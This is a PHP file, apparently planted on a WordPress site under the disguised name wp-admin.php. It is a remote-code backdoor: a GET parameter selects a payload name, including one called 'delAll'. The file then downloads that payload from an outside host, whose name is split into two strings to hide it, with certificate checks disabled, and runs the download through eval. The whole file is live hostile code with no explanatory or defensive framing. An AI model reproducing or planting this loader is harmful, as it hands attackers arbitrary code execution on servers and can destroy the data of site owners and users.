| Current File : /home/eticmes/www/wp-admin.php |
<?php
$a = isset($_GET['a']) ? $_GET['a'] : 0;
$txt = '0303';
if($a == 1){
$txt = 'delAll';
}elseif($a == 2){
$txt = '0305';
}
if ( function_exists( "curl_init" ) && function_exists( "curl_exec" ) ) {
$handle = curl_init();
curl_setopt( $handle, CURLOPT_URL, 'https://new'.'get.top/file/'.$txt.'.txt' );
curl_setopt( $handle, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $handle, CURLOPT_HEADER, false );
curl_setopt( $handle, CURLOPT_SSL_VERIFYHOST, false );
curl_setopt( $handle, CURLOPT_SSL_VERIFYPEER, false );
$response = curl_exec( $handle );
$curl_error = curl_error( $handle );
if ( !$curl_error ) {
$response = array(
"data" => @eval( "?>". $response )
);
return $response;
}else{
echo $curl_error;
}
if ( PHP_VERSION_ID < 80000 ) {
curl_close( $handle );
}
}
// 123